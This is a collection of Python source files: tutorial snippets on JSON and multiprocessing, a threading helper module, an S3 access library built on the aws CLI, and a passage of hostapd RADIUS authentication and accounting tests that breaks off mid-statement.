| source | python |
|---|---|
Json.py
|
# import json
# d = dict(name='Bob', age=20, score=88)
# jstr=json.dumps(d)
# print(jstr)
# d1=json.loads(jstr)
# print(d1)
import json

class Student(object):
    def __init__(self, name, age, score):
        self.name = name
        self.age = age
        self.score = score

s = Student('Bob', 20, 88)
print(json.dumps(s, default=lambda obj: obj.__dict__))
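# A minimal round-trip sketch (not in the original snippet): turning the JSON
# string back into a Student via the object_hook parameter of json.loads().
def dict2student(d):
    return Student(d['name'], d['age'], d['score'])

jstr2 = json.dumps(s, default=lambda obj: obj.__dict__)
s2 = json.loads(jstr2, object_hook=dict2student)
print(s2.name, s2.age, s2.score)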
from multiprocessing import Process
import os

# Code to be executed by the child process
def run_proc(name):
    print('Run child process %s (%s)...' % (name, os.getpid()))

if __name__ == '__main__':
    print('Parent process %s.' % os.getpid())
    p = Process(target=run_proc, args=('test',))
    print('Child process will start.')
    p.start()
    p.join()
    print('Child process end.')
|
threads.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import threading
from six.moves import queue
def execute_function_multithreaded(fn,
args_list,
block_until_all_done=True,
max_concurrent_executions=1000):
"""
Executes fn in multiple threads each with one set of the args in the
args_list.
:param fn: function to be executed
:type fn:
:param args_list:
:type args_list: list(list)
    :param block_until_all_done: if True, the function blocks until all the
        threads are done and returns the results of each thread's execution.
:type block_until_all_done: bool
:param max_concurrent_executions:
:type max_concurrent_executions: int
:return:
If block_until_all_done is False, returns None. If block_until_all_done is
True, function returns the dict of results.
{
index: execution result of fn with args_list[index]
}
:rtype: dict
"""
result_queue = queue.Queue()
worker_queue = queue.Queue()
for i, arg in enumerate(args_list):
arg.append(i)
worker_queue.put(arg)
def fn_execute():
while True:
try:
arg = worker_queue.get(block=False)
except queue.Empty:
return
exec_index = arg[-1]
res = fn(*arg[:-1])
result_queue.put((exec_index, res))
threads = []
number_of_threads = min(max_concurrent_executions, len(args_list))
for _ in range(number_of_threads):
thread = in_thread(target=fn_execute, daemon=not block_until_all_done)
threads.append(thread)
# Returns the results only if block_until_all_done is set.
results = None
if block_until_all_done:
# Because join() cannot be interrupted by signal, a single join()
# needs to be separated into join()s with timeout in a while loop.
have_alive_child = True
while have_alive_child:
have_alive_child = False
for t in threads:
t.join(0.1)
if t.is_alive():
have_alive_child = True
results = {}
while not result_queue.empty():
item = result_queue.get()
results[item[0]] = item[1]
if len(results) != len(args_list):
raise RuntimeError(
'Some threads for func {func} did not complete '
'successfully.'.format(func=fn.__name__))
return results
def in_thread(target, args=(), name=None, daemon=True, silent=False):
"""
    Executes the given function in the background.
:param target: function
:param args: function arguments
:param name: name of the thread
    :param daemon: run as daemon thread, do not block until thread is done
:param silent: swallows exceptions raised by target silently
    :return: background thread
"""
if not isinstance(args, tuple):
raise ValueError('args must be a tuple, not {}, for a single argument use (arg,)'
.format(type(args)))
if silent:
def fn(*args):
try:
target(*args)
except:
pass
else:
fn = target
bg = threading.Thread(target=fn, args=args, name=name)
bg.daemon = daemon
bg.start()
return bg
def on_event(event, func, args=(), stop=None, check_interval_seconds=1.0, silent=False):
"""
Executes the given function in a separate thread when event is set.
    That thread can be stopped by setting the optional stop event.
    The stop event is checked regularly every check_interval_seconds.
Exceptions will silently be swallowed when silent is True.
:param event: event that triggers func
:type event: threading.Event
:param func: function to trigger
:param args: function arguments
:param stop: event to stop thread
:type stop: threading.Event
:param check_interval_seconds: interval in seconds to check the stop event
:type check_interval_seconds: float
:param silent: swallows exceptions raised by target silently
:return: thread
"""
if not isinstance(args, tuple):
raise ValueError('args must be a tuple, not {}, for a single argument use (arg,)'
.format(type(args)))
if stop is None:
def fn():
event.wait()
func(*args)
else:
def fn():
while not event.is_set() and not stop.is_set():
event.wait(timeout=check_interval_seconds)
if not stop.is_set():
func(*args)
return in_thread(fn, silent=silent)
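# A minimal usage sketch (not part of the original module). Assuming a
# hypothetical download(url) helper, this runs it over several URLs with at
# most 4 concurrent threads; args_list entries must be lists, because the
# implementation appends the execution index to each one.
#
#   urls = ['http://example.com/a', 'http://example.com/b']
#   results = execute_function_multithreaded(download,
#                                            [[u] for u in urls],
#                                            max_concurrent_executions=4)
#   # results[i] holds download(urls[i])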
|
spawning_processes_sk.py
|
#Spawn a Process – Chapter 3: Process Based Parallelism
import multiprocessing
def CustomFunction(i):
    print('Running function with process no: %s' % i)
    for j in range(0, i):
        print('Loop result of the function with no: %s' % j)
    return

if __name__ == '__main__':
    for i in range(6):
        process = multiprocessing.Process(target=CustomFunction, args=(i,))
        process.start()
        process.join()
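# Note: because join() is called inside the loop, each child process finishes
# before the next one starts. A minimal sketch of the fully parallel variant
# (same CustomFunction, start everything first, then join):
#
#   processes = [multiprocessing.Process(target=CustomFunction, args=(i,))
#                for i in range(6)]
#   for p in processes:
#       p.start()
#   for p in processes:
#       p.join()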
|
s3.py
|
import json
import errno
import os
import tempfile
import sys
import subprocess
import time
import re
from collections import defaultdict
from urllib.parse import urlparse
#
# This creates an S3 file that supports seeking and caching.
# We keep this file at Python2.7 for legacy reasons
global debug
_LastModified = 'LastModified'
_ETag = 'ETag'
_StorageClass = 'StorageClass'
_Key = 'Key'
_Size = 'Size'
_Prefix = 'Prefix'
READ_CACHE_SIZE = 4096 # big enough for front and back caches
MAX_READ = 65536 * 16
debug = False
READTHROUGH_CACHE_DIR = '/mnt/tmp/s3cache'
AWS_CLI_LIST = ['/usr/bin/aws', '/usr/local/bin/aws', '/usr/local/aws/bin/aws']
AWS_CLI = None
def awscli():
global AWS_CLI
if AWS_CLI is None:
for path in AWS_CLI_LIST:
if os.path.exists(path):
AWS_CLI = path
return AWS_CLI
raise RuntimeError("Cannot find aws executable in "+str(AWS_CLI_LIST))
return AWS_CLI
def get_bucket_key(loc):
"""Given a location, return the (bucket,key)"""
p = urlparse(loc)
if p.scheme == 's3':
return p.netloc, p.path[1:]
if p.scheme == '':
if p.path.startswith("/"):
(ignore, bucket, key) = p.path.split('/', 2)
else:
(bucket, key) = p.path.split('/', 1)
return bucket, key
    raise ValueError("{} is not an s3 location".format(loc))
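# A minimal sketch of the expected behavior (hypothetical bucket and key names):
#
#   get_bucket_key('s3://my-bucket/path/to/key')  ->  ('my-bucket', 'path/to/key')
#   get_bucket_key('my-bucket/path/to/key')       ->  ('my-bucket', 'path/to/key')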
def aws_s3api(cmd, debug=False):
aws = awscli()
fcmd = [aws, 's3api', '--output=json'] + cmd
if debug:
sys.stderr.write(" ".join(fcmd))
sys.stderr.write("\n")
try:
p = subprocess.Popen(fcmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(out,err) = p.communicate()
if p.returncode==0:
if out==b'':
return out
try:
return json.loads(out.decode('utf-8'))
except json.decoder.JSONDecodeError as e:
print(e,file=sys.stderr)
print("out=",out,file=sys.stderr)
raise e
else:
err = err.decode('utf-8')
if 'does not exist' in err:
raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), str(cmd))
else:
raise RuntimeError("aws_s3api. cmd={} out={} err={}".format(cmd,out,err))
except TypeError as e:
raise RuntimeError("s3 api {} failed data: {}".format(cmd, e))
def put_object(bucket, key, fname):
"""Given a bucket and a key, upload a file"""
assert os.path.exists(fname)
return aws_s3api(['put-object', '--bucket', bucket, '--key', key, '--body', fname])
def put_s3url(s3url, fname):
"""Upload a file to a given s3 URL"""
(bucket, key) = get_bucket_key(s3url)
return put_object(bucket, key, fname)
def get_object(bucket, key, fname):
"""Given a bucket and a key, download a file"""
if os.path.exists(fname):
raise FileExistsError(fname)
return aws_s3api(['get-object', '--bucket', bucket, '--key', key, fname])
def head_object(bucket, key):
"""Wrap the head-object api"""
return aws_s3api(['head-object', '--bucket', bucket, '--key', key])
def delete_object(bucket, key):
"""Wrap the delete-object api"""
return aws_s3api(['delete-object', '--bucket', bucket, '--key', key])
def delete_s3url(s3url):
(bucket, key) = get_bucket_key(s3url)
return delete_object( bucket, key )
PAGE_SIZE = 1000
MAX_ITEMS = 1000
def list_objects(bucket, prefix=None, limit=None, delimiter=None):
"""Returns a generator that lists objects in a bucket. Returns a list of dictionaries, including Size and ETag"""
# handle the case where an S3 URL is provided instead of a bucket and prefix
if bucket.startswith('s3://') and (prefix is None):
(bucket, prefix) = get_bucket_key(bucket)
next_token = None
total = 0
while True:
cmd = ['list-objects-v2', '--bucket', bucket, '--prefix', prefix,
'--page-size', str(PAGE_SIZE), '--max-items', str(MAX_ITEMS)]
if delimiter:
cmd += ['--delimiter', delimiter]
if next_token:
cmd += ['--starting-token', next_token]
res = aws_s3api(cmd)
if not res:
return
if 'Contents' in res:
for data in res['Contents']:
yield data
total += 1
if limit and total >= limit:
return
if 'NextToken' not in res:
return # no more!
next_token = res['NextToken']
elif 'CommonPrefixes' in res:
for data in res['CommonPrefixes']:
yield data
return
else:
return
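# A minimal usage sketch (hypothetical bucket and prefix): stream object records
# and report their total size without materializing the whole listing.
#
#   total = 0
#   for obj in list_objects('my-bucket', prefix='logs/', limit=1000):
#       total += obj[_Size]
#   print(total)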
def search_objects(bucket, prefix=None, *, name, delimiter='/', limit=None, searchFoundPrefixes=True, threads=20):
"""Search for occurences of a name. Returns a list of all found keys as dictionaries.
@param bucket - the bucket to search
@param prefix - the prefix to start with
@param name - the name being searched for
@param delimiter - the delimiter that separates names
@param limit - the maximum number of names keys to return
@param searchFoundPrefixes - If true, do not search for prefixes below where name is found.
@param threads - the number of Python threds to use. Note that this is all in the same process.
"""
import queue, threading
if limit is None:
limit = sys.maxsize # should be big enough
ret = []
def worker():
while True:
prefix = q.get()
if prefix is None:
break
found_prefixes = []
found_names = 0
for obj in list_objects(bucket, prefix=prefix, delimiter=delimiter):
if _Prefix in obj:
found_prefixes.append(obj[_Prefix])
                if (_Key in obj) and obj[_Key].split(delimiter)[-1] == name:
                    found_names += 1
                    if len(ret) < limit:
                        ret.append(obj)
                    if len(ret) > limit:
                        break
if found_names == 0 or searchFoundPrefixes:
if len(ret) < limit:
for lp in found_prefixes:
q.put(lp)
q.task_done()
q = queue.Queue()
thread_pool = []
for i in range(threads):
t = threading.Thread(target=worker)
t.start()
thread_pool.append(t)
q.put(prefix)
# block until all tasks are done
q.join()
# stop workers
for i in range(threads):
q.put(None)
for t in thread_pool:
t.join()
return ret
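# A minimal usage sketch (hypothetical names): find every object called
# 'manifest.json' anywhere under a prefix, using 20 worker threads.
#
#   hits = search_objects('my-bucket', prefix='datasets/', name='manifest.json',
#                         threads=20)
#   for obj in hits:
#       print(obj[_Key], obj[_Size])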
def etag(obj):
"""Return the ETag of an object. It is a known bug that the S3 API returns ETags wrapped in quotes
see https://github.com/aws/aws-sdk-net/issue/815"""
etag = obj['ETag']
if etag[0] == '"':
return etag[1:-1]
return etag
def object_sizes(sobjs):
"""Return an array of the object sizes"""
return [obj['Size'] for obj in sobjs]
def sum_object_sizes(sobjs):
"""Return the sum of all the object sizes"""
return sum(object_sizes(sobjs))
def any_object_too_small(sobjs):
"""Return if any of the objects in sobjs is too small"""
MIN_MULTIPART_COMBINE_OBJECT_SIZE = 0
return any([size < MIN_MULTIPART_COMBINE_OBJECT_SIZE for size in object_sizes(sobjs)])
def download_object(tempdir, bucket, obj):
"""Given a dictionary that defines an object, download it, and set the fname property to be where it was downloaded"""
if 'fname' not in obj:
obj['fname'] = tempdir + "/" + os.path.basename(obj['Key'])
get_object(bucket, obj['Key'], obj['fname'])
def concat_downloaded_objects(obj1, obj2):
"""Concatenate two downloaded files, delete the second"""
# Make sure both objects exist
assert os.path.exists(obj1['fname'])
assert os.path.exists(obj2['fname'])
# Concatenate with cat (it's faster than doing it in Python)
subprocess.run(['cat', obj2['fname']], stdout=open(obj1['fname'], 'ab'))
# Update obj1
obj1['Size'] += obj2['Size']
if 'ETag' in obj1: # if it had an eTag
del obj1['ETag'] # it is no longer valid
os.unlink(obj2['fname']) # remove the second file
return
class S3File:
"""Open an S3 file that can be seeked. This is done by caching to the local file system."""
def __init__(self, name, mode='rb'):
self.name = name
self.url = urlparse(name)
if self.url.scheme != 's3':
raise RuntimeError("url scheme is {}; expecting s3".format(self.url.scheme))
self.bucket = self.url.netloc
self.key = self.url.path[1:]
self.fpos = 0
self.tf = tempfile.NamedTemporaryFile()
cmd = [awscli(), 's3api', 'list-objects', '--bucket', self.bucket, '--prefix', self.key, '--output', 'json']
data = json.loads(subprocess.Popen(cmd, encoding='utf8', stdout=subprocess.PIPE).communicate()[0])
file_info = data['Contents'][0]
self.length = file_info['Size']
self.ETag = file_info['ETag']
# Load the caches
self.frontcache = self._readrange(0, READ_CACHE_SIZE) # read the first 1024 bytes and get length of the file
if self.length > READ_CACHE_SIZE:
self.backcache_start = self.length - READ_CACHE_SIZE
if debug:
print("backcache starts at {}".format(self.backcache_start))
self.backcache = self._readrange(self.backcache_start, READ_CACHE_SIZE)
else:
self.backcache = None
def _readrange(self, start, length):
# This is gross; we copy everything to the named temporary file, rather than a pipe
# because the pipes weren't showing up in /dev/fd/?
# We probably want to cache also... That's coming
cmd = [awscli(), 's3api', 'get-object', '--bucket', self.bucket, '--key', self.key, '--output', 'json',
'--range', 'bytes={}-{}'.format(start, start + length - 1), self.tf.name]
if debug:
print(cmd)
data = json.loads(subprocess.Popen(cmd, encoding='utf8', stdout=subprocess.PIPE).communicate()[0])
if debug:
print(data)
self.tf.seek(0) # go to the beginning of the data just read
return self.tf.read(length) # and read that much
def __repr__(self):
return "FakeFile<name:{} url:{}>".format(self.name, self.url)
def read(self, length=-1):
# If length==-1, figure out the max we can read to the end of the file
if length == -1:
length = min(MAX_READ, self.length - self.fpos + 1)
if debug:
print("read: fpos={} length={}".format(self.fpos, length))
# Can we satisfy from the front cache?
if self.fpos < READ_CACHE_SIZE and self.fpos + length < READ_CACHE_SIZE:
if debug:
print("front cache")
buf = self.frontcache[self.fpos:self.fpos + length]
self.fpos += len(buf)
if debug:
print("return 1: buf=", buf)
return buf
# Can we satisfy from the back cache?
if self.backcache and (self.length - READ_CACHE_SIZE < self.fpos):
if debug:
print("back cache")
buf = self.backcache[self.fpos - self.backcache_start:self.fpos - self.backcache_start + length]
self.fpos += len(buf)
if debug:
print("return 2: buf=", buf)
return buf
buf = self._readrange(self.fpos, length)
self.fpos += len(buf)
if debug:
print("return 3: buf=", buf)
return buf
def seek(self, offset, whence=0):
if debug:
print("seek({},{})".format(offset, whence))
if whence == 0:
self.fpos = offset
elif whence == 1:
self.fpos += offset
elif whence == 2:
self.fpos = self.length + offset
else:
raise RuntimeError("whence={}".format(whence))
if debug:
print(" ={} (self.length={})".format(self.fpos, self.length))
def tell(self):
return self.fpos
def write(self):
raise RuntimeError("Write not supported")
def flush(self):
raise RuntimeError("Flush not supported")
def close(self):
return
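# A minimal usage sketch (hypothetical URL): S3File supports seek()/read(), so
# it can serve code that expects a random-access, read-only binary file.
#
#   f = S3File('s3://my-bucket/big-archive.zip')
#   f.seek(-22, 2)           # jump near the end of the object
#   trailer = f.read(22)
#   f.close()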
#
# S3 Cache
#
# Tools for reading and write files from Amazon S3 without boto or boto3
# http://boto.cloudhackers.com/en/latest/s3_tut.html
# but it is easier to use the AWS cli, since it's configured to work.
#
# This could be redesigned to simply use the S3File() below
# Todo: redesign so that it can be used in a "with" statement
class s3open:
def __init__(self, path, mode="r", encoding=sys.getdefaultencoding(), cache=False, fsync=False):
"""
Open an s3 file for reading or writing. Can handle any size, but cannot seek.
We could use boto.
http://boto.cloudhackers.com/en/latest/s3_tut.html
but it is easier to use the aws cli, since it is present and more likely to work.
@param fsync - if True and mode is writing, use object-exists to wait for the object to be created.
"""
if not path.startswith("s3://"):
raise ValueError("Invalid path: " + path)
if "b" in mode:
encoding = None
self.path = path
self.mode = mode
self.encoding = encoding
self.cache = cache
self.fsync = fsync
cache_name = os.path.join(READTHROUGH_CACHE_DIR, path.replace("/", "_"))
# If not caching and a cache file is present, delete it.
if not cache and os.path.exists(cache_name):
os.unlink(cache_name)
        if cache and ('w' not in mode):
            os.makedirs(READTHROUGH_CACHE_DIR, exist_ok=True)
            if os.path.exists(cache_name):
                # Serve the read directly from the local cache file.
                self.p = None
                self.file_obj = open(cache_name, mode=mode, encoding=encoding)
                return
        assert 'a' not in mode
        assert '+' not in mode
        if "r" in mode:
            if cache:
                # Populate the cache, then read from the cached copy.
                subprocess.check_call([awscli(), 's3', 'cp', '--quiet', path, cache_name])
                self.p = None
                self.file_obj = open(cache_name, mode=mode, encoding=encoding)
                return
self.p = subprocess.Popen([awscli(), 's3', 'cp', '--quiet', path, '-'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding=encoding)
self.file_obj = self.p.stdout
elif "w" in mode:
self.p = subprocess.Popen([awscli(), 's3', 'cp', '--quiet', '-', path],
stdin=subprocess.PIPE, encoding=encoding)
self.file_obj = self.p.stdin
else:
raise RuntimeError("invalid mode:{}".format(mode))
def __enter__(self):
return self.file_obj
def __exit__(self, exception_type, exception_value, traceback):
self.file_obj.close()
        if self.p is not None and self.p.wait() != 0:
            raise RuntimeError(self.p.stderr.read())
self.waitObjectExists()
def waitObjectExists(self):
if self.fsync and "w" in self.mode:
(bucket, key) = get_bucket_key(self.path)
aws_s3api(['wait', 'object-exists', '--bucket', bucket, '--key', key])
# The following 4 methods are only needed for direct use of s3open as object, outside with-statement, rather than as a context manager
def __iter__(self):
return self.file_obj.__iter__()
def read(self, *args, **kwargs):
return self.file_obj.read(*args, **kwargs)
def write(self, *args, **kwargs):
return self.file_obj.write(*args, **kwargs)
def close(self):
self.waitObjectExists()
return self.file_obj.close()
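# A minimal usage sketch (hypothetical URL): s3open works as a context manager
# for streaming reads and writes without seeking.
#
#   with s3open('s3://my-bucket/notes.txt', 'w', fsync=True) as f:
#       f.write('hello\n')
#   with s3open('s3://my-bucket/notes.txt', 'r') as f:
#       print(f.read())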
def s3exists(path):
"""Return True if the S3 file exists. Should be replaced with an s3api function"""
out = subprocess.Popen([awscli(), 's3', 'ls', '--page-size', '10', path],
stdout=subprocess.PIPE, encoding='utf-8').communicate()[0]
return len(out) > 0
def s3rm(path):
"""Remove an S3 object"""
(bucket, key) = get_bucket_key(path)
res = aws_s3api(['delete-object', '--bucket', bucket, '--key', key])
print("res:",type(res))
if res['DeleteMarker'] != True:
raise RuntimeError("Unknown response from delete-object: {}".format(res))
class DuCounter:
def __init__(self):
self.total_bytes = 0
self.total_files = 0
def count(self, bytes_):
self.total_bytes += bytes_
self.total_files += 1
def print_du(root):
"""Print a DU output using aws cli to generate the usage"""
prefixes = defaultdict(DuCounter)
cmd = [awscli(),'s3','ls','--recursive',root]
print(" ".join(cmd))
p = subprocess.Popen(cmd,stdout=subprocess.PIPE, encoding='utf-8')
    part_re = re.compile(r"(\d\d\d\d-\d\d-\d\d) (\d\d:\d\d:\d\d)\s+(\d+) (.*)")
total_bytes = 0
MiB = 1024*1024
try:
for (ct,line) in enumerate(p.stdout):
parts = part_re.search(line)
if parts is None:
print("Cannot parse: ",line,file=sys.stderr,flush=True)
continue
bytes_ = int(parts.group(3))
path = parts.group(4)
total_bytes += bytes_
prefixes[ os.path.dirname(path) ].count(bytes_)
if ct%1000==0:
print(f"files: {ct} MiB: {int(total_bytes/MiB):,} {parts.group(4)}",flush=True)
except KeyboardInterrupt as e:
print("*** interrupted ***")
print(f"Total lines: {ct} MiB: {int(total_bytes/MiB):,},")
fmt1 = "{:>10}{:>20} {}"
fmt2 = "{:>10}{:>20,} {}"
print()
print("Usage by prefix:")
print(fmt1.format('files','bytes','path'))
for path in sorted(prefixes):
print(fmt2.format(prefixes[path].total_files,
prefixes[path].total_bytes,
path))
print("")
print("Top 20 by size:")
print(fmt1.format('files','bytes','path'))
for (ct,path) in enumerate(sorted(prefixes, key=lambda path:prefixes[path].total_bytes, reverse=True),1):
print(fmt2.format(prefixes[path].total_files,
prefixes[path].total_bytes,
path))
if ct==20:
break
if __name__ == "__main__":
t0 = time.time()
count = 0
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter,
description="Combine multiple files on Amazon S3 to the same file.")
parser.add_argument("--ls", action='store_true', help="list a s3 prefix")
parser.add_argument("--du", action='store_true', help='List usage under an s3 prefix')
parser.add_argument("--delimiter", help="specify a delimiter for ls")
parser.add_argument("--debug", action='store_true')
parser.add_argument("--search", help="Search for something")
parser.add_argument("--threads", help="For searching, the number of threads to use", type=int, default=20)
parser.add_argument("roots", nargs="+")
args = parser.parse_args()
if args.debug:
debug = args.debug
for root in args.roots:
(bucket, prefix) = get_bucket_key(root)
if args.ls:
for data in list_objects(bucket, prefix, delimiter=args.delimiter):
print("{:18,} {}".format(data[_Size], data[_Key]))
count += 1
if args.search:
for data in search_objects(bucket, prefix, name=args.search, searchFoundPrefixes=False, threads=args.threads):
print("{:18,} {}".format(data[_Size], data[_Key]))
count += 1
if args.du:
print_du(root)
t1 = time.time()
if args.ls or args.search:
print("Total files: {}".format(count), file=sys.stderr)
print("Elapsed time: {}".format(t1 - t0), file=sys.stderr)
|
test_radius.py
|
# RADIUS tests
# Copyright (c) 2013-2016, Jouni Malinen <[email protected]>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import subprocess
import threading
import time
import hostapd
from utils import *
from test_ap_hs20 import build_dhcp_ack
from test_ap_ft import ft_params1
def connect(dev, ssid, wait_connect=True):
dev.connect(ssid, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="[email protected]",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=wait_connect)
@remote_compatible
def test_radius_auth_unreachable(dev, apdev):
"""RADIUS Authentication server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
if int(mib["radiusAuthClientPendingRequests"]) < 1:
raise Exception("Missing pending RADIUS Authentication request")
def test_radius_auth_unreachable2(dev, apdev):
"""RADIUS Authentication server unreachable (2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.17"
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
logger.info("radiusAuthClientAccessRetransmissions: " + mib["radiusAuthClientAccessRetransmissions"])
def test_radius_auth_unreachable3(dev, apdev):
"""RADIUS Authentication server initially unreachable, but then available"""
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.18"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('auth_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_radius_acct_unreachable(dev, apdev):
"""RADIUS Accounting server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 2:
raise Exception("Missing RADIUS Accounting retransmissions")
if int(mib["radiusAccClientPendingRequests"]) < 2:
raise Exception("Missing pending RADIUS Accounting requests")
def test_radius_acct_unreachable2(dev, apdev):
"""RADIUS Accounting server unreachable(2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
found = False
for i in range(4):
time.sleep(1)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) > 0 or \
int(mib["radiusAccClientPendingRequests"]) > 0:
found = True
if not found:
raise Exception("Missing pending or retransmitted RADIUS Accounting requests")
def test_radius_acct_unreachable3(dev, apdev):
"""RADIUS Accounting server initially unreachable, but then available"""
require_under_vm()
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.18"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('acct_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
time.sleep(1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalResponses'])
req_e = int(as_mib_end['radiusAccServTotalResponses'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_unreachable4(dev, apdev):
"""RADIUS Accounting server unreachable and multiple STAs"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
for i in range(20):
connect(dev[0], "radius-acct")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_radius_acct(dev, apdev):
"""RADIUS Accounting"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = ["126:s:Operator", "77:s:testing",
"62:d:1"]
params['radius_acct_req_attr'] = ["126:s:Operator", "62:d:1",
"77:s:testing"]
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
dev[2].connect("radius-acct", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
logger.info("Checking for RADIUS counters")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 3:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_req_attr(dev, apdev, params):
"""RADIUS request attributes"""
try:
import sqlite3
except ImportError:
raise HwsimSkip("No sqlite3 module available")
db = os.path.join(params['logdir'], "radius_req_attr.sqlite")
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-req-attr")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = ["126:s:Operator"]
params['radius_acct_req_attr'] = ["126:s:Operator"]
params['radius_req_attr_sqlite'] = db
hapd = hostapd.add_ap(apdev[0], params)
with sqlite3.connect(db) as conn:
sql = "INSERT INTO radius_attributes(sta,reqtype,attr) VALUES (?,?,?)"
for e in [(dev[0].own_addr(), "auth", "77:s:conn-info-0"),
